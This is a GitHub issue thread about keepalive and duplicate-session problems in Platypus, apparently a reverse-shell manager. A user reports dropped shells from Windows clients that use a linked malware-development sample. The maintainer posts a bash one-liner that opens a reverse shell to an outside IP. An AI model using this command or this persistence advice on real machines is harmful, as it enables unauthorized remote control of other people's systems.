KeepAlive option
ariadarkkkis opened this issue · 13 comments
Hi, It would be great to add keepalive to connected session
@ariadarkkkis
Sorry for the late reply.
By default, all connection will alive unless the client process is killed.
I am not sure what do you mean by keepalive, would you like to elaborate that?
Im using to code to get a reverse shell, But the problem is if you dont send anything to client for about 5 minutes I guess (im not sure bu definitely more than 2 Minutes), the client will disconnect and Because I edited the code and added a loop, so It will connect again. And after some time, the client list is like 100 connections from same IP address but none of them will connect until I connect to one of them and send something and then they will reconnect and after that I have to send something to the client again and then I get the shell running. Even after getting shell running and sending some commands, If you dont send something to client within that time I said, it will disconnect again. BTWW, I edited the code so it has 60 Seconds sleep (or timeout) to try to connect to my server again after it disconnected.
and BTW, I have 1 core 1GB ram VPS and when a lot of clients(which is not a lot, most of them are duplicate clients) after about some days, CPU usage on 1Core cpu will max to 100%. And I have to kill Platypus and re-run it again.
I guess it should have keep-alive option in it in case anyone needs. So sends some packets to client every like 60 Seconds so the client wont disconnect from my server. Im using Ubuntu 16.04 x64 LTS for running Platypus.
The predecessor of this tool actually has this function which is able to detect connections from the same IP and killing multiple connections from the same IP, but this function is removed due to possible NAT and port forwarding. You are right, I am thinking about whether I need to join to kill features from the same IP connection. maybe make it a server option.
You know due to the complexity of different operating systems and different shells, it is very difficult to detect whether it is from the same real host. Therefore, we have to use IP to uniquely identify a host. I don't know if this identifier is reasonable.
How do you create the reverse shell session, did you try to use bash commands like this?
bash -c 'bash >/dev/tcp/1.2.3.4/4444 0>&1 &'
@WangYihang sorry didnt paste the code, I use this code on Windows Machines:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
You can use hostname as an identifier or maybe add something like an identifier in a custom reverse shell like the one I gave you above. So the user can manually set the identifier or it gets the hostname and some other information like CPU and OS and something and make a hash out of them to make it unique.
@WangYihang It breaked my VPS, as I said before, after some days, the cpu load on 1core VPS will max out. I forgot to restart platypus and now my VPS has breaked.
@ariadarkkkis solved by @zxyxx,appreciate for his excellent work!
@zxyxx @WangYihang Can you make to replace new connection from same IP with old one? Like if a client with 1.2.3.4 IP connected 10 minutes ago and it sent another session now from same IP, Platypus replace new session with the old one and remove old one.
Because I still have this problem that I cant rejoin a session after about 10 minutes. Because session times out. Im using this as my reverse shell on Windows clients:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
I get this when I try to interact with a session from 30 minutes ago:
2019/03/18 05:37:20 Interacting with [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]
2019/03/18 05:37:20 Read from client failed
2019/03/18 05:37:20 Closing client: [170cbxxxxxxxxxxxxxx] tcp://1.2.3.4:22334 (connected at: 30 minutes ago) [false]
I used jump and then interact with that session. I dont know what the problem is and why the connection doesnt stay alive.
@ariadarkkkis Hey, bro, thank you so much for your reporting, could you please create a new issue to explain this feature request. ( one issue for a single problem ~ thank u~